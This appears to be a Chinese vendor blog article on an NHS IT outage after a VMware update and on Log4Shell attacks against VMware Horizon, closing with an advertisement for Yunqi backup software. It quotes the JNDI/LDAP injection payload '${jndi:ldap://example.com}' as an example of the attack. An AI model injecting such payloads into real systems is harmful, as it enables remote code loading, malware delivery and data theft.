近日,英国国民保健署(NHS)由于安装“跨国软件服务商所提供的操作系统推荐更新和安全补丁”,导致NHS的20个IT系统瘫痪。
后续情况也更糟,在试图删除该补丁时,系统数据几乎完全丢失,事件演变为一起严重的IT事故。
NHS(National Health Service)统筹调配医疗资源,承担着医疗保健的重要责任,体系主要分为两大层次。第一层次是以社区为主的基层医疗服务,第二层次医疗以医院为主,包括急症、专科门诊及检查、手术治疗和住院护理等。
当事单位桑德威尔和西伯明翰NHS信托基金采用的是VMware虚拟化服务平台,就在导致信托机构系统崩溃前几周,VMware撤下了Sphere的最新正式版(7.0 Update 3),声称需要“保护我们的客户免受潜在故障的影响”。
新版本下架前,就曾有用户提出过一系列系统崩溃、备份失灵等问题。
不久之后,NHS Digital再次发布公告称,一个“未知威胁组织”正试图利用VMware Horizon虚拟桌面平台中的Log4shell漏洞( CVE-2021-44228 ),分发恶意软件并窃取敏感信息。
犯罪团伙利用嵌入在 VMware Horizon中的Apache Tomcat服务进行 Log4Shell 攻击,从简单且广泛使用的“${jndi:ldap://example.com}”有效负载开始,生成PowerShell命令,紧接着进行检索路径、启动服务、植入恶意软件。
Tomcat生成的PowerShell命令 来源:NHS
攻击流程图 来源:NHS
该漏洞正在被越来越多的犯罪团伙利用,已经对全球数百万消费者和产品构成潜在威胁。
VMware发言人表示:“凡是连接到互联网,但尚未针对Log4j漏洞打补丁的服务都很容易受到黑客攻击,VMware强烈建议立即采取措施。”
云祺VMware虚拟机解决方案
针对VMware用户更新版本导致数据丢失以及遭遇勒索的情况,云祺灾备体系可为VMware用户提供VMware云架构平台以及深入到应用系统的全方位数据保护,为业务系统搭建强有力的防护墙。
1、保证备份数据完整性
云祺备份为用户完全备份所有数据,即所有备份点都是VMware虚拟机的完整备份数据。当业务发生故障,使用完全备份点,可以保证恢复出来的VMware虚拟机数据的完整性,同时,完全备份点适合用作异地副本和归档,有利于企业合规性要求。
2、快速恢复并自动启动虚拟机
在启动VMware虚拟机瞬时恢复任务时,可以自定义是否自动开机,在关键业务故障的情况下,可以在秒级时间内恢复业务运行,并帮助用户节约人工管理成本,恢复完成后虚拟机自动开机,实现业务更快的启动。
3、预防勒索软件攻击
云祺为VMware用户提供备份数据加密保护功能,通过银行级算法对备份数据进行加密处理,确保备份数据的安全性,即使被获取到备份数据,也无法查看备份数据具体内容,让企业远离勒索软件的威胁。
除此之外,云祺特有的备份数据防篡改功能,能够有效应对勒索软件攻击,通过Vinchin Encrypted Backups技术,全周期全方位对备份数据进行监控和保护,当有勒索软件或恶意软件尝试修改备份数据时,将被直接拒绝访问,为用户数据安全再添保障。
在此,云祺建议所有VMware用户尽早将灾备建设提上日程,确保数据安全万无一失,切勿给网络犯罪留可乘之机。
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
